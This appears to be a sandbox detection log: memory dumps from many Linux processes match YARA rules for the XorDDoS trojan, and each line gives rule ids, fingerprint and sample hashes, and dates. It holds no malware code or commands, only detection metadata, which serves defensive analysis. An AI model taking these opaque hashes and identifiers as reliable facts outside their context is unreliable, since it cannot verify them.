Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6333.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6336.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6392.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6499.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6560.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6474.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6514.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6269.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6303.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6364.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6266.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6356.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
